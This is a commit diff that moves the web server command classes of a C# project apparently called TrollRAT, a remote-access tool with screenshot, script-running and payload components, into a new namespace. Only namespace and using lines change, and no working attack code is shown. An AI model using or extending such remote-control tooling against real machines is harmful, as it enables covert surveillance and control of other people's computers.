Move Web Server Commands to their own Namespace
This commit is contained in:
parent
4f2354e7fb
commit
233a7b0a3a
7 changed files with 7 additions and 6 deletions
|
@ -8,7 +8,7 @@ using TrollRAT.Actions;
|
|||
using TrollRAT.Payloads;
|
||||
using TrollRAT.Utils;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
namespace TrollRAT.Server.Commands
|
||||
{
|
||||
public abstract class ActionCommandBase<t> : WebServerCommand where t : IDBase
|
||||
{
|
||||
|
|
|
@ -6,7 +6,7 @@ using System.Web;
|
|||
|
||||
using TrollRAT.Payloads;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
namespace TrollRAT.Server.Commands
|
||||
{
|
||||
public abstract class DetailCommandBase : WebServerCommand
|
||||
{
|
||||
|
|
|
@ -6,7 +6,7 @@ using System.Net;
|
|||
using System.Text.RegularExpressions;
|
||||
using System.Windows.Forms;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
namespace TrollRAT.Server.Commands
|
||||
{
|
||||
public class ScreenshotCommand : WebServerCommandBase
|
||||
{
|
||||
|
|
|
@ -8,7 +8,7 @@ using System.Reflection;
|
|||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
namespace TrollRAT.Server.Commands
|
||||
{
|
||||
public class RunScriptCommand : WebServerCommandBase
|
||||
{
|
||||
|
|
|
@ -4,7 +4,7 @@ using System.Net;
|
|||
using System.Text.RegularExpressions;
|
||||
using TrollRAT.Utils;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
namespace TrollRAT.Server.Commands
|
||||
{
|
||||
public class GenerateCodeCommand : WebServerCommandBase
|
||||
{
|
||||
|
|
|
@ -8,7 +8,7 @@ using TrollRAT.Payloads;
|
|||
using TrollRAT.Plugins;
|
||||
using TrollRAT.Utils;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
namespace TrollRAT.Server.Commands
|
||||
{
|
||||
public class RootCommand : WebServerCommand
|
||||
{
|
||||
|
|
|
@ -10,6 +10,7 @@ using TrollRAT.Utils;
|
|||
using TrollRAT.Actions;
|
||||
using TrollRAT.Server.Injections;
|
||||
using System.Reflection;
|
||||
using TrollRAT.Server.Commands;
|
||||
|
||||
namespace TrollRAT.Server
|
||||
{
|
||||
|
|
Reference in a new issue